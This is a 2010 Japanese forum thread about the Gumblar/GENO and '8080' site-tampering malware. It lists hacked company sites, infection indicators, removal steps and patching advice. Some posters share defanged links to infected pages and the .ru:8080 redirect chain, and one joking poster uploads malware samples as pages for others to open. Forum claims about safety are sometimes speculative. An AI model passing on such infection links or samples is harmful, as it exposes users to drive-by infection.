AdobeReaderもFlashPlayerもJREも、 常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。 つまり、アップデートに気を使ってた場合でも、 最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
競合相手がいないからさ
>>720 感染しているPCはCPU使用率が異常に高いのも目安のひとつだな
サイト改ざんリスト(発表分のみ)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113 三栄コーポレーション
サイバーエージェント
ハウス食品
東京財団
データリンクス
京王電鉄
ビロング
恵那バッテリー電装
ナショナルクリエイターズカンファレンス
大学図書館問題研究会
モロゾフ
民主党東京都総支部連合会
ローソン
検索エンジンMooter
デジタルマガジン
ディズニー
信越放送
FX為替情報検索「fxwill.com」
野村ビルマネジメント
京成トラベルサービス
本田技研工業
JR東日本
ラジオ関西
しかし、とんでもねー数だな…
adobeもアレだけど感染した企業のセキュリティに対する認識の甘さも問題だな
736 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 18:02:49
>>732 ここらのサイトやアメブロなんかで気づかずに感染してる一般人って相当数いるんじゃね?
今回のは自分が感染してるかどうか分からないみたいだし…
>>732 ネズミーもか!?
閲覧者多そうだしますますやばいな
>>721 一応他スレから転載
437 :8080:2010/01/08(金) 18:03:07 ID:Db0zlWvOO
>>435 旧Gumblarのやつは使えない。
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
*感染していた場合*
駆除するより、バックアップを取ってから
リカバリ(クリーンインストール)を強く推奨。
>>732 ディズニー見ちゃったよ
いつの時点で改ざんされてたんだろう
>>737-738 リンク先読めばわかるけど、大体の企業は
「特定のページがやられてて、それ以外は今のところ異常ない」って建前らしい。
まあ、ウイルスの全貌が解析されきってない以上
実際のところはどうだかわかったもんじゃないけどね。
>>732 >■検索エンジンMooter(2009年12月30日発表)
>種別:/*GNU GPL*/
>期間:2009年12月25日1時〜12月28日18時30分
>場所:Mooterホームページ(*.mooter.co.jp)、および「Mooter検索窓」の設置サイト
>告知:弊社ホームページの改ざんについてのお詫びとお知らせ(削除済み)
こことか地味に酷くね?
検索窓設置してるサイトもやられてるとしたら、どこまで広がってるか…
しかも告知「削除済み」とか対応がありえねえだろ。
>>743 >■ディズニー(2009年12月29日発表)
>種別:Gumblar.x
>期間2009年12月22日16時〜12月25日18時
>場所:ショッピングサイト お正月特集ページ(www.disney.co.jp●shopping/special/0912_newyear.html)
>告知:お正月特集ページに関するお詫び
>www.disney.co.jp●shopping/pop/091229_info.html
でもまぁ、 (1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする (2)Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する の対策が取れてたら感染サイト踏んでたとしても大丈夫なはずだが一応
>>746-748 わざわざすいません
該当する期間とショッピングサイトには行っていないから
なんとかセフセフ
>>750 http://pc11.2ch.net/test/read.cgi/sec/1259607683/405 今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
もともとスクリプトを検出していたのは少ない win.jpgなどの脆弱性を突いた攻撃自体を検出した方が効率的だろ 脆弱性攻撃を受けた後実行されるpdfupf.exeだけを検出すものもあるがこれでも防御は可能
現時点じゃ他に確認のしようがない
「New谷さん」呼びはやめろよな
>>755 "sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
の部分は新しいやつで
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
に変わってる
しかし同じような名前なのですぐ気づく
これからも変わるかも知れないが変な物が登録されているかはすぐ分かるだろう
760 :
752 :2010/01/08(金) 18:37:49
ごめん誤爆だった
このあいだfirefox NoScript+view-source:で 感染サイトのソース見ようとしたらavast!がプゥプゥいった。 この状況でも感染するもの? adobeのjavaはオフにしてある。
糸色望した
763 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 18:42:29
>>761 その場合はNoScriptでブロックされているはず
問題ない
>adobeのjavaはオフにしてある。
Tips:JavaとJavaScriptは別物
view-sourceだけでも安全な気がしてたんだが・・・ 違うのね
安全だよ
txtとして開くんだから大丈夫じゃないの?
txt形式でもウイルスのコード記述があれば反応するのでは 感染はしないけど
>>763 ありがとう
ていうかview-source:ってリンク先のサイト踏まずに
ソースがみれるものだと思ってたんだがウイルスは防げないのか…
オンラインソースチェッカー閉鎖が惜しまれる
初心者で申し訳ないんだけど、
>>753 の(1)〜(4)に加えて
IEでセキュリティ高にしたり、firefox+NoScript使えばさらに安全になるのかな?
>>710 モロゾフの人がFTPログを証拠として被害届けを出したそうですね
でもあれは不正アクセスの証明にしかなりませんね
モロゾフの人健忘症なのでしょうかね
自身が加害者であることは伝えてあるのですが
対応が駄目駄目です
>モロゾフの人
首吊って氏んだ方がいいとおもいますよ
>モロゾフの人 文句があったらかかってきなさい -o_japan-オルティスジャパンー
>>773 調べたいサイトのURLを入力してクリック
結果のページ右のスクリーンショット(クリックすると拡大します)これで見られます
更新するものは最新版に更新して、 Adobe Reader、JRE、QuickTimeとか大して使わないものはアンインストール Adobe Readerなんて他の無料で軽いの使えばいいんだし これが一番の防御策だね
779 :
sage ◆sage/xLnlI :2010/01/08(金) 19:09:32
>>702 検体(コードが書いてあるやつ)いるならあげる
うpできるかわからないけど
ドクター中松さんのサイトは修正済みみたいだね
>>159 ここはまだだね
いつの間にかLGPLに変わってるし
>>738 なんで馬鹿みたいにネズミーとか言うんだろ
長くてみんどくさいならTDLとかでいいじゃん
何かスゲーむかついたので
>ネズミー
>>782 LGPLだね
元がどうだったか知らないけど
788 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 19:45:43
「GNU(ぐぬー)たん」 お馴染みのヌーを萌擬人化したキャラ 誰か・・・描いて・・・
>>773 右上のスクリーンショットの下からいけるGatewayへ。
上のフレームにある「ソース表示」でソースを持ってこれる。
だから、最初からGatewayに行ったらいいんじゃないかな。
ttp://gw.aguse.jp/ 逆に、ここからaguseに行くことも可能(フレームの「ウェブ調査」)。
ノートンは対応してないのか・・・
>>739 の方法で調べて
スタートアップにsiszyd32.exeとTMD.tmpの両方なかったら
この手のウイルスには感染していないでFA?
感染してないと思うけど気になるので
朝刊の一面になるほどのニュースなのに 対策していない企業とかマジでありえない 対策していないネットユーザにも責任はあるが そのままWEBサイトを放置している企業の責任は重大
>>790 ノートンは脆弱性保護で最初から対応してる
今はファイルも検出する
>>159 こちらがまだだったのでVPCで踏んでみた。
特に何も起こらない・・・
フラッシュのバージョンが10.0.42.34だと影響ないということ?
>>794 感染が気になるならスタートアップ確認でOK
さらに言えばタスクマネージャーで確認
797 :
790 :2010/01/08(金) 20:31:54
>>796 タスクマネージャーにもmsconfigで見たスタートアップにも
siszyd32.exeとTMD.tmpは影も形もなかったよ、よかった
みんな教えてくれてありがとう
798 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 20:35:03 BE:1098795874-2BP(7777)
オンラインスキャンしたところで検出できるやつがなかったりするからな
800 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 20:41:04
>>799 オワタ\(^o^)/
今でも(´・ω・) スクリプトが埋め込まれているうrlplz
Quick Time ですけど、QuickTime Alternativeはどうなんでしょ?入れて置いてもいいの? アホな質問しているのかしら…。
803 :
sage ◆sage/xLnlI :2010/01/08(金) 21:08:21
805 :
sage ◆sage/xLnlI :2010/01/08(金) 21:13:40
806 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 21:18:10
>>805 カスペルスキー無反応
win7
firefox カスペルスキー仮想実行モード
809 :
ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:41:15
810 :
ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:43:09
812 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 21:47:22
新ウイルスに対応したオンラインスキャナーないのかよ・・・ アンチウイルスソフトをインスコするたびにBSOD祭りの俺はどうすれば・・・
>>811 Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません
URL:
>>811 このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:50:29
Kaspersky Internet Security 2010
814 :
ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:52:22
>>812 なにそれこわい
明日は京都は違う検体をupします
種類も変えます(明日も鬼畜なやつにしようwwwwwwフヒッwwwwwww)
upの仕方
コードを書いてtxtに
↓
up
↓
txtをhtmlに書き換え
ヽ('A`)ノ 完成!
( )
ノω|
816 :
ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:54:29
>>811 なにも起こらない 当たり前だけど
(pspで2ch北から)
817 :
ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:56:13
検体upは仮装pcから←オヌヌメ
818 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 21:57:26
>>817 最近のウイルスはホストOSまで影響を与えるらしいよ(そよっ
仮想PCだから安心なんてのは幻想にすぎんよ
>>811 こういうのは2chブラウザビューアで見ても感染しない?
>>820 winマシンで見る限り絶対安心とは言えない
>>817 押入れから古いPC(HDD無)引っ張り出して
KNOPPIX(DVD)+USBメモリマウント
823 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 22:12:44
>>777 Adobe互換ソフトも必ずしも安全ではないと何度言えば
825 :
sage ◆sage/xLnlI :2010/01/08(金) 22:14:12
>>818 ( ゚д゚)
(つд⊂)ゴシゴシ
(;゚д゚)
(つд⊂)ゴシゴシ
_, ._
(;゚ Д゚) …?!
( ゚д゚ )フラグビンビン[ピー]ビンビン
もうこうなると、まだ無事なサイト上げた方が早い気すらしてくる
828 :
sage ◆sage/xLnlI :2010/01/08(金) 22:18:14
ホストpcスペック OS windows7 メモリー 4GB CPU AMD アスロン64X2 2.7GHz ADOBE 8.12 flash 最新 JRE ? 12
他はともかく、JREはアンインスコしとけば他のウィルス対策にもなるから アンインスコしない手はない
830 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 22:20:41
>>826 ウイルス踏んでもいないのにクリーンインストールかよ・・・
アレなんだよ・・・NICのドライバと競合して入れられない俺のマシン
アンチウイルスと犬猿の仲・・・
831 :
sage ◆sage/xLnlI :2010/01/08(金) 22:43:00
>>829 俺はJREがないと2chが見れませんので無理でつ
833 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 22:58:13
>>832 最近更新されていないお・・・
バージョンを色々と変えてみたが・・・ムリポ
>>823 あれ、教えてもずっと放置してたのにいつの間にかサーバ落としたのか
836 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 23:10:45
ウイルスに感染できるうrlplz
>>717 ケータイに感染するウィルスなかったっけ
「日本伸銅協会」をヤフで検索、キャッシュのソース内にしっかりと/*GNU GPL*/がwww
840 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 23:53:34
危ないURLを踏んでみたが感染しなかったwww 俺最強
『蜂の家』でググって一番上のサイトはまだ感染してるのかな
このウイルスって2度目のアクセスは感染させるためのページ表示させない仕様なのかな?
アプリケーションの追加と削除にJAVAの旧バージョンが10個位あったんだけど影響とかあるの?
javaなんてほとんど使い道ないから全部消した方が安心
お絵かきチャットできなくなっちゃう!><
846 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 00:05:04
今日の会社のお年寄りの会話 おっさんA「ガンプラって怖いらいな、HP見ただけで・・・」 おっさんB「ブログ見ただけでも感染するって書いてあるぞ・・・」 もれ心の中で「それ、ガンプラじゃなくてガンブラーだから・・・ しかも、仕事中にどんなところ覗いているんだよ・・・おっさんども。」
Java消したらEclipse使えないじゃん
848 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 00:12:14
849 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 00:23:37
>>744 鳩山首相のtwitter偽アカウントやってたメガネ王という人のブログにmooterのブログパーツがあって、
年末ちょっと騒動になった
インターネットに公開してる企業のサイトは、 セキュリティのきっちりしたデータセンターに鯖が置いてあって、 更新時なんかは許可された端末からのみVPN経由でできるよう にしてあるのが常識だと思ってたんだけど、意外とみんなそうじゃないんだね・・・
そんなところはほとんどないだろ
社内セキュリティ>サイト
853 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 01:22:32
>>847 そうそう
JREのバージョンを上げるって対策だけはおいそれと出来ないから困ってる
>>854 色々不具合が起きるケースが多いわな、確かに。
わかります、戸松遥,中島愛,早見沙織なわけですね
変則的だけど、インストーラは別だからシステムに影響するJREは最新にして JDK側は開発に合わせるとかもできなくもない気がする 試してないけどね お絵かきしたい人は諦めてくれ
>>844 JAVAのバージョンチェックしたらJAVAそのものが入っていなかったでござる
噴いたwww
>>859 あれ? 俺書いたっけ・・・
とりあえずJAVA入れてきたw
>>732 見たけど
■三栄コーポレーション(2010年1月8日発表)
告知:「モッフル」ホームページの改ざんとウイルス被害に関する報告とお詫び[PDF]
いま出すお詫びがPDFでなくてもよかろうもん
サイバー/サーバー/サバイバー(なんかキワモノバンドの名前になりそうな) しかしネットサーフィンも電脳サバイバルの様相を呈してきた感じ・・・
20XX年にはネットサーフィンをしていて脳を焼き切られたりする訳か。
ノートソ警察w tp://megalodon●jp/2010-0107-1225-07/ameblo●jp/caetla-2008/entry-10427328482●html
>753 (4) JRE(Java Runtime Environment)を最新版に更新する JRE入れてなかったら問題無い? それともJRE入れて最新版にしとかないと駄目?
いらないなら入れる必要はない
個人PCに悪さしないならおとなしくAvast!のupdateまったほうがいいんではないかな
>>870 avast使ってる人はそれでも良いんじゃないか
みんなが使ってると思ってるのかな
avast!タン ずっと一緒だお! きゅいきゅい きゅいーん!
もう馬鹿しか使ってない
>>872 なんでもいいけどアンチウイルスのupdateをまてばいいのさ
意味分からねえな 馬鹿havastのスレいけよ
アンチウイルスの対応待つんじゃなくて 脆弱性の対処しとけば良いだけだ avastなんかに期待するな
878 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 07:56:01
>>849 検索窓のパーツに含まれてるJavaScriptファイルがやられてたので
設置してたサイトは改ざんサイト同然。
「ノートン警察」のブログパーツもJavaScriptファイルだから同じね。
>>744 >期間:2009年12月25日1時〜12月28日18時30分
改ざんファイルのタイムスタンプは 2009/12/24 1:30(GMT)周辺だったんだが、
どういう計算すると12月25日1時になるんだろ。
2009/12/26 2:47:54(GMT)に、検索窓のJavaScriptファイルだけ直したみたい。
ほかの奴のは29日夕方だけど、28日18時30分に閉鎖したってことかな
879 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 09:16:47
880 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 09:28:19
881 :
sage ◆sage/xLnlI :2010/01/09(土) 09:37:40
おっっっっっっっっっっっっっっっっっっっっっっっっはっっっっっっっっっっっっっっっっっっっっっっっっっっっようごっごっごごごごごございまkっさ
>>880 aguseのカスペが反応しないんだが新種かねぇ?
883 :
sage ◆sage/xLnlI :2010/01/09(土) 09:45:20
http://www16 ●atpages.jp/filedl/ds%20psp%20syosinsyakouza.html
884 :
sage ◆sage/xLnlI :2010/01/09(土) 09:46:02
885 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 09:50:52
886 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 09:53:04
ClamAVに検体送っといたお
888 :
sage ◆sage/xLnlI :2010/01/09(土) 10:02:17
>>883 に付け加え
コード
が
書いてある
だけ
です
889 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 10:15:30
>>879 を踏んでみた→Adobe ReaderとJavaが起動したが結局何も起こらず
両者とも最新版だお
ニフティのオンラインスキャンやっても 3万ファイルぐらいでスキャン終了されて system32のログとかローカルの中のtmpとかロック扱いで中身見てもらえないんだが これ本当に大丈夫なんだろうか マカフィーは今日手動更新してもファイル更新できないし FTP使った後、一時間以上サイト改ざんされなければもう白でいいのか?
>>889 >踏んでみた→Adobe ReaderとJavaが起動
これアウトじゃね?
pdf開いてないのにReaderは普通起動しないだろ…
892 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 10:38:02
/*------------------------------------------------------------ * ロールオーバーを設定する画像にクラス名「over」を指定 * ロールオーバー時に表示するための画像ファイル名後ろに「_over」をつける /*------------------------------------------------------------*/
894 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 10:44:13
しかも今回の攻撃は最新版のAdobe Readerがまだ修正してない脆弱性を使うようなんだが… 仮想環境でもないWindowsであんまりチャレンジしない方がいいぞ
その落ちてくるPDFってのをくれ scriptが埋め込むURLにアクセスしても0byteが帰ってくるだけで 何も落ちてこない。 windows使ってないから?リファラ見てる?
896 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 11:01:14
今回悪用されていると思われる脆弱性のPoC拾ってきたお 悪質なコードを取り除きPDFを作成次第配布するお
>>889 ReaderはバージョンだけじゃなくJavaScript機能オフまでが対策
>>890 1時間程度じゃ改ざんされない可能性もある
心配ならOS入れなおせよ
>>895 リファラも見てるかもしれんが
少なくともUserAgentは見てるんじゃね
899 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 11:09:21
>>889 > Adobe ReaderとJavaが起動したが結局何も起こらず
何も起きてないことをどうやって確認したんだ?
901 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 11:12:10
>>900 ファイル操作系のAPIを全てフックして監視していたお
念のためにディスクイメージも比較した
結論:特に変化無し
>>889 は、まだトロイ本体が侵入して無いだけの状態かな?
>>901 APIフックって自作?
何かツールあるの?
企業が結構やられてるから個人のサイトなんかもう恐くて見れないな 2ちゃんがやられる可能性もあるの?
905 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 11:16:01
時間経過で変化出るのかな
908 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 11:24:54
>>910 要するにファイル操作系のAPIを全てフックして監視すればいいんじゃね?
>>811 凸電した
お宅のHPをみたらPCぶっ壊れたと言ってやった
>>879 HEUR:Exploit.Script.Generic
カスペルスキー
ジェネリックで検知
ru:8080側でアクセス制御していて2度目以降は404を装うと何度言ったら…。 IP変えて(串可)どうぞ。
アンチウイルスが反応するリンクをそのまま張るな
919 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 13:39:48
またAviraは誤検出か いい加減にしとけや
921 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 14:56:04
ファイル操作系だけじゃなくてプロセス生成とかネットワークを監視しなくていいのか? というか監視は普通にProcess Monitorとかでできるんじゃないか
高木浩光さんコメントお願いします
高木はNyzillaで忙しい
924 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 15:45:45
>>921 それだと表示されない関数があるお
Wiresharkと適当な実装のAPIフックプログラムを併用しているお
何故かVistaでフック出来ない件
教えてエロい人
ム板行け
語尾の「〜お」がキモい 死ね
927 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 15:57:02
はいはいVipper乙
おちつけお( ^ω^)
929 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 16:06:39
(゚ω゚)VIPお断りします
930 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 16:10:57
(´・ω・) カワイソス
931 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 16:13:57
>>924 プラグインの起動まではしているがその後こけてるということか
具体的にどういうコードが動いてるかは見てる?
セキュ板はNoノートンだおだお
933 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 18:57:52
このメールは全ご登録ユーザー様、
および製品情報サービスを申し込まれた方にお送りしております。
「Gumblar(ガンブラー)」関連ウイルスにご注意ください
ソースネクスト株式会社
いつもソースネクスト製品をご愛用いただき、誠にありがとうございます。
さて、現在、改ざんされたサイトを閲覧しただけで感染する「Gumblar(ガンブラー)」と
その亜種が流行しています。念のため、利用されているウイルス対策ソフトの対応状況を
確認されることをおすすめいたします。
なお、ソースネクストの「ウイルスセキュリティ」は、これらのウイルスに対応済みですので、
必要な方はこの機会にご検討ください。
セキュリティ製品のお客様専用サイト
http://mail.sourcenext.info/c/arzdfpimb1tdwKab 「ウイルスセキュリティ」のお買い求めはこちら
eSHOP価格4,480円 (標準価格 4,980円) 10%OFF
http://mail.sourcenext.info/c/arzdfpimb1tdwKac 今後ともソースネクスト製品を末永くお使いいただきますようお願い申し上げます
だが! 断る!!
936 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 19:33:26
ClamAVニダ
>>616 FTP通信そのものを見てるとしたら繋いだFTP鯖だけだよね
繋いでないのに改竄されてる・一つ繋いだら他のFTP鯖のサイトも改竄されたと言ってる人はどうなるの?
繋いだのに忘れてるのかな?
>>937 FTPクライアントにパスが保存してあるって
それを読み取られてるんじゃね?
嗚呼w日本語がw
JAVAとJavascriptオフにしてたら感染しない?
>>937 genoを解析したところによると一部のFTPクライアントの設定を読み取って改ざんするとなってた。
スレの内容も堂々巡りだなw
>>941 Genoとは別物だけどね
FTPクライアントの設定ファイルは見てるのは事実
こう頻繁に見つかると企業の極秘情報も中国に売られてるんじゃない?
avast! が LGPL のスクリプトに対応した JS:Illredir-C [Trj]
カーチャンのPCが物凄いアクセスしてくる
カーチャンが必死なんだろ
951 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 23:41:12
カーチャンがんがれ!
>>948 100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった
953 :
名無しさん@お腹いっぱい。 :2010/01/09(土) 23:48:08
権限なしのなら大丈夫?
>>953 これはなんだ?
NoScript入れてたからどうもないと思うが
Security Tool はGumblarみたいにFTP情報流したりしないの?
>>953 NoScript解いたけどどうもならないな・・・
>>958 当たり前だろ。出来ないんだったら
古い情報垂れ流して混乱招くからサイトごと消せ
>>958 8080系がそのGENOウイルスと一緒だと思ってて
そこに書いてある対策とか薦めてる人が結構いるから
せめて注意書きくらいはしといた方がいいんじゃない?
>>958 感染の確認方法と復帰方法は違う種類なので役に立たないと
いうのは書いておいた方がいいかも
963 :
名無しさん@お腹いっぱい。 :2010/01/10(日) 00:42:23
ブロック推奨うrl
http://baidu-com ●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/
糞長すぎ乙
964 :
958 :2010/01/10(日) 00:52:25
>963 8080以下は何種類からかランダムで決まるから意味なし乙 それなら.ru:8080/をブロックする方がマシ
968 :
名無しさん@お腹いっぱい。 :2010/01/10(日) 01:11:09
感染したサイト
↓リダイレクト
http://baidu-com ●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/
↓リダイレクト
http://baidu-com ●fandango●com●linkedin-com●webdirectbroker●ru:8080/index●php?ys
↓/pics/jquery.jx→eval("Aapdk2='M';");
現在人力デコードなう ←今ココ
>>964 超乙
それはいまも必要な情報でございます
そろそろまずいので次スレ立ててくる
973 :
972 :2010/01/10(日) 01:35:01
ERROR!
ERROR:新このホストでは、しばらくスレッドが立てられません。
またの機会にどうぞ。。。
orz
ダメだったのでテンプレ貼り
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/ 【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
980 :
名無しさん@お腹いっぱい。 :2010/01/10(日) 01:44:44
8080関連の検体詰め合わせってうpっても大丈夫なのか?
>>980 検出可否報告スレにならロダもあるし提出もしてくれそうで一石二鳥
解凍パスワードを"infected"か "virus"にしてうp
レッドカード出ますたw
985 :
名無しさん@お腹いっぱい。 :2010/01/10(日) 02:00:29
Bingのキャッシュに/*GNU GPL*/
ほかもやられてるお。。。
凄いな・・・
>>985 実施中の緊急メンテナンス終了予定のお知らせ
対応早いね
対応早いとこはだいたいわかってないからな 再発する
http://www ●mag-x●com/にアクセスするとメンテナンスページに飛ばされるけど
リダイレクトが2回あって1回目でG dataが反応する
>993 このWebページはウイルスに感染しています 次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo 情報: 2:21:57 Kaspersky Internet Security 2010
>>985 これ一ブログじゃなくて収容してるブログ全体にウイルスコード入れられたのか
ikhvyhbl;lknouvb;jnl/ nu:;lj/.kl\;N*M* なんだこれ新型か?
1000なら癌ブラーは無くなる
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。